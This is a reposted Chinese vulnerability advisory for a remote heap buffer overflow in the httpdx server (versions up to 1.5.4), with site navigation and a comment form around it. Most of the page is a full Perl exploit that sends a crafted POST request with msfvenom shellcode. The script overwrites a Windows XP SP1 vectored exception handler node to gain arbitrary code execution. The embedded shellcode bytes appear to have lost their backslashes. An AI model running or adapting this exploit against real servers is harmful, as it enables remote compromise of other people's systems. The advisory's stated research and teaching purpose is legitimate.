Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / httpdx堆缓冲区溢出漏洞

发布日期:2012-07-29
更新日期:2012-07-31受影响系统:
httpdx httpdx 1.5.4
httpdx httpdx 1.5.3b
httpdx httpdx 1.5.3
httpdx httpdx 1.5.2
httpdx httpdx 1.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 54712httpdx是一款轻型的http和ftp服务器。 httpdx 1.5.4及之前版本在实现上存在远程堆缓冲区溢出漏洞,攻击者可利用此漏洞在受影响应用中执行任意代码。<*来源:st3n
  *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!st3n ()提供了如下测试方法:
#!/usr/bin/perl -w
#======================================================================
# Exploit Title: httpdx <= 1.5.4 Remote Heap Overflow
# Date: 28 July 2012
# Exploit Author: st3n [at sign] funoverip [dot] net
# Vendor Homepage: http://httpdx.sourceforge.net
# Download link: http://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/httpdx1.5.4.zip/download
# Version: 1.5.4
# Tested on: WinXP SP1
#======================================================================
# Additional notes:
# -----------------
#
# - During a POST request, httpdx allocates memory with malloc(size+1),
#   where "size" is actually the value of "Content-Length" HTTP header..
#   All post-data will then be copied into this area using strncpy(x,y,size2),
#   where "size2" = "request length" - "header length" (and not Content-Length)
#
# - As httpdx use it own handler function upon crash, this exploit  overwrite
#   the first _VECTORED_EXCEPTION_NODE structure with a pointer to our shellcode.
#
# - The exploit works very often, but not always. In both case, httpdx crash
#   after the exploit.
#
# - WinXP SP1
#   0x77ED73B4 --> UnhandledExceptionFilter()
#======================================================================
use strict;
use IO::Socket::INET;
# target
my $host = "127.0.0.1";# The [perl|php|py|..] page to call during the POST request.
# The page must exists and the extension must be defined in the directive
# "http.handlers = {...}" in httpdx.conf
my $page = "/test.pl";
# Windows XP - SP1 - English
# ---------------------------
# ptr to the first _VECTORED_EXCEPTION_NODE structure  = 0x77fc3210 - 4
my $veh_node_addr = 0x77fc320c ;# pointer to out shellcode => 0x00227664 - 8 = 0x0022765c
my $sc_ptr = 0x0022765c;
# shellcode
# (msfvenom -p windows/exec -f perl CMD=calc.exe)
my $shellcode =
"xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52" .
"x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26" .
"x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0d" .
"x01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0" .
"x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b" .
"x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xff" .
"x31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7d" .
"xf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8b" .
"x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44" .
"x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8b" .
"x12xebx86x5dx6ax01x8dx85xb9x00x00x00x50x68" .
"x31x8bx6fx87xffxd5xbbxf0xb5xa2x56x68xa6x95" .
"xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbb" .
"x47x13x72x6fx6ax00x53xffxd5x63x61x6cx63x2e" .
"x65x78x65x00";
# flush after every write
$| = 1;my $sock = IO::Socket::INET->new("$host:80");print $sock "POST $page HTTP/1.0 " .
        "Content-Length: 1023 " .
        "Content-Type: text " .
        "Host: $host" . " " .
        " " .
        # shellcode
        $shellcode .
        # nops
        "x90" x (1032-length($shellcode)) .
        # VEH addr
        pack("V", $veh_node_addr) .
        # ptr to shellcode
        pack("V", $sc_ptr)
        ;
# if any ...
while(<$sock>){
        print $_;
}
exit;建议:
--------------------------------------------------------------------------------
厂商补丁:httpdx
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://httpdx.sourceforge.net/Sysax Multi Server函数缓冲区溢出漏洞Libxml2多个整数溢出漏洞相关资讯      堆缓冲区溢出漏洞  httpdx 
  • Microchip TCP/IP Stack 堆缓冲区  (05/04/2013 07:08:14)
  • Opera Web浏览器缓冲区溢出和信息  (11/22/2012 06:44:01)
  • IcedTea-Web堆缓冲区溢出漏洞(CVE-  (11/10/2012 13:45:23)
  • grep整数溢出堆缓冲区溢出漏洞  (12/27/2012 08:24:54)
  • Novell File Reporter "NFRAgent.  (11/19/2012 19:18:06)
  • LibTIFF "TIFFScanlineSize()"函数  (11/06/2012 08:51:02)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款